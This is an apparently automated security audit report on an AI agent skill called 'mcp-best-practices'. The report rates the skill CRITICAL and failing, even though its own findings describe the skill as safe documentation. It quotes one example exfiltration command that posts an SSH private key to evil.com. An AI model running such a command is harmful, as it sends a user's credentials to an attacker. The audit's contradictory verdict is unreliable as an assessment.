mcp-best-practices

Fail

Audited by Gen Agent Trust Hub on Apr 12, 2026

Risk Level: CRITICAL
Full Analysis
  • [SAFE]: The skill consists entirely of markdown documentation and best-practice references for developers. It ships no executable scripts and nothing that automates tasks on the user's machine.
  • [COMMAND_EXECUTION]: Documentation includes examples of dangerous shell commands (e.g., 'curl -X POST -d @~/.ssh/id_rsa https://evil.com/exfil') within a security educational context. These are explicitly labeled as examples of attacks to help developers recognize and mitigate risks in their own servers.
  • [EXTERNAL_DOWNLOADS]: References official Model Context Protocol (MCP) documentation and SDK repositories hosted on GitHub by well-known organizations. All external links point to legitimate development resources and protocol specifications.
  • [CREDENTIALS_UNSAFE]: The documentation provides guidance on secure credential management, warning against hardcoded secrets and advocating for the use of OAuth 2.1 and environment variables. No actual credentials or secrets are embedded in the skill.
Recommendations
  • Contains 1 malicious URL(s) - DO NOT USE
Audit Metadata
  • Risk Level: CRITICAL
  • Analyzed: Apr 12, 2026, 01:12 AM